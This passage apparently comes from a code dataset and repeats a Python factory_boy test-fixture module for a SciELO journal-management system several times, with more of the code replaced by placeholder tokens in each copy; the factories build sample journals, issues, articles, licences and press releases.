'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n\n\nclass UserFactory(factory.Factory):\n <assignment token>\n <function token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n\n\nclass GroupFactory(factory.Factory):\n FACTORY_FOR = Group\n name = factory.Sequence(lambda n: 'Group #%s' % n)\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n\n\nclass GroupFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n FACTORY_FOR = models.SubjectCategory\n term = 'Acoustics'\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n short_title = u'ABCD.(São Paulo)'\n editorial_standard = u'vancouv'\n secs_code = u'6633'\n init_year = u'1986'\n acronym = factory.Sequence(lambda n: 'ABCD%s' % int(n))\n pub_level = u'CT'\n init_num = u'1',\n subject_descriptors = (\n u\"\"\"\n MEDICINA\n CIRURGIA\n GASTROENTEROLOGIA\n GASTROENTEROLOGIA\"\"\"\n .strip())\n publisher_name = u'Colégio Brasileiro de Cirurgia Digestiva'\n publisher_country = u'BR'\n publisher_state = u'SP'\n publication_city = u'São Paulo'\n editor_address = (\n u'Av. Brigadeiro Luiz Antonio, 278 - 6° - Salas 10 e 11, 01318-901 São Paulo/SP Brasil, Tel. = (11) 3288-8174/3289-0741'\n )\n editor_email = u'[email protected]'\n creator = factory.SubFactory(UserFactory)\n use_license = factory.SubFactory(UseLicenseFactory)\n\n\nclass SectionFactory(factory.Factory):\n FACTORY_FOR = models.Section\n code = factory.Sequence(lambda n: 'BJCE%s' % n)\n journal = factory.SubFactory(JournalFactory)\n\n\nclass LanguageFactory(factory.Factory):\n FACTORY_FOR = models.Language\n iso_code = 'pt'\n name = 'portuguese'\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n\n\nclass SubjectCategoryFactory(factory.Factory):\n <assignment token>\n <assignment token>\n\n\nclass StudyAreaFactory(factory.Factory):\n FACTORY_FOR = models.StudyArea\n study_area = 'Health Sciences'\n\n\nclass SponsorFactory(factory.Factory):\n FACTORY_FOR = models.Sponsor\n name = u'Fundação de Amparo a Pesquisa do Estado de São Paulo'\n address = (\n u'Av. Professor Lineu Prestes, 338 Cidade Universitária Caixa Postal 8105 05508-900 São Paulo SP Brazil Tel. / Fax: +55 11 3091-3047'\n )\n email = '[email protected]'\n complement = ''\n\n\nclass UseLicenseFactory(factory.Factory):\n FACTORY_FOR = models.UseLicense\n license_code = factory.Sequence(lambda n: 'CC BY-NC-SA%s' % n)\n reference_url = u'http://creativecommons.org/licenses/by-nc-sa/3.0/deed.pt'\n disclaimer = (\n u'<a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\"><img alt=\"Licença Creative Commons\" style=\"border-width:0\" src=\"http://i.creativecommons.org/l/by-nc-sa/3.0/88x31.png\" /></a><br />Este trabalho foi licenciado com uma Licença <a rel=\"license\" href=\"http://creativecommons.org/licenses/by-nc-sa/3.0/\">Creative Commons - Atribuição - NãoComercial - CompartilhaIgual 3.0 Não Adaptada</a>.'\n )\n\n\nclass CollectionFactory(factory.Factory):\n FACTORY_FOR = models.Collection\n url = u'http://www.scielo.br/'\n name = factory.Sequence(lambda n: 'scielo%s' % n)\n address_number = u'430'\n country = u'Brasil'\n address = u'Rua Machado Bittencourt'\n email = u'[email protected]'\n name_slug = factory.Sequence(lambda n: 'scl%s' % n)\n\n\nclass JournalFactory(factory.Factory):\n FACTORY_FOR = models.Journal\n ctrl_vocabulary = u'decs'\n frequency = u'Q'\n scielo_issn = u'print'\n print_issn = factory.Sequence(lambda n: '1234-%04d' % int(n))\n eletronic_issn = factory.Sequence(lambda n: '4321-%04d' % int(n))\n init_vol = u'1'\n title = u'ABCD. Arquivos Brasileiros de Cirurgia Digestiva (São Paulo)'\n title_iso = u'ABCD. Arquivos B. de C. D. (São Paulo)'\n 